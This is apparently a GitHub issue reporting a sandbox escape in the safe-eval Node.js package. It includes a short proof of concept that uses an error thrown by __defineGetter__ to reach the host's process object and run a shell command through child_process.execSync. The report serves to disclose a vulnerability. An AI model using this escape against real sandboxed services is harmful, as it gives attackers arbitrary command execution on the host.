Open seongil-wi opened 1 year ago
// node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() { try{ __defineGetter__("x", ); } catch(ret){ ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); }} )() ` safeEval(code);
Sandbox can be escaped by prototype pollution by calling __defineGetter__ function. Also, we can execute arbitrary shell code using process module.
__defineGetter__
Sandbox can be escaped by prototype pollution by calling
__defineGetter__function. Also, we can execute arbitrary shell code using process module.